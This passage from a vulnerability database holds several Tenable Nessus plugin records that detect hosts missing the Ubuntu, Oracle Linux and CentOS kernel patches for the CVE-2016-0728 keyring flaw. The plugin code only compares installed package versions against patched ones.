A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2872-3/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected linux-image-4.2-raspi2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.2-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:15.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(15\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 15.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2872-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"15.10\", pkgname:\"linux-image-4.2.0-1020-raspi2\", pkgver:\"4.2.0-1020.27\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.2-raspi2\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:50:56", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-118.2.5.el7uek]\n- KEYS: Fix keyring 
ref leak in join_session_keyring() (Yevgeny Pats) \n[Orabug: 22563965] {CVE-2016-0728}", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-21T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-21T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3509.NASL", "href": "https://www.tenable.com/plugins/nessus/88032", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3509.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88032);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-0728\");\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2016-3509)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-118.2.5.el7uek]\n- KEYS: Fix keyring ref leak in join_session_keyring() (Yevgeny Pats) \n[Orabug: 22563965] {CVE-2016-0728}\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-January/005703.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-January/005704.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-118.2.5.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3509\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.2.5.el6uek-0.4.5-3.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", 
reference:\"kernel-uek-devel-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.2.5.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.2.5.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-118.2.5.el7uek-0.4.5-3.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-118.2.5.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-118.2.5.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", 
"description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2871-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2871-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88013);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2871-2\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-vivid vulnerability (USN-2871-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2871-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.19-generic,\nlinux-image-3.19-generic-lpae and / or linux-image-3.19-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.19-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. 
/ NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2871-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-generic-lpae\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.19.0-47-lowlatency\", pkgver:\"3.19.0-47.53~14.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else 
audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.19-generic / linux-image-3.19-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:30", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. 
The system\nmust be rebooted for this update to take effect.", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-26T00:00:00", "title": "CentOS 7 : kernel (CESA-2016:0064)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-26T00:00:00", "cpe": ["p-cpe:/a:centos:centos:perf", "p-cpe:/a:centos:centos:python-perf", "p-cpe:/a:centos:centos:kernel-doc", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:kernel-tools-libs-devel", "p-cpe:/a:centos:centos:kernel-tools", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-tools-libs", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-abi-whitelists", "p-cpe:/a:centos:centos:kernel-debug-devel"], "id": "CENTOS_RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88148", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064 and \n# CentOS Errata and Security Advisory 2016:0064 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88148);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"CentOS 7 : kernel (CESA-2016:0064)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat 
Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-January/021625.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5252ffe4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0728\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag 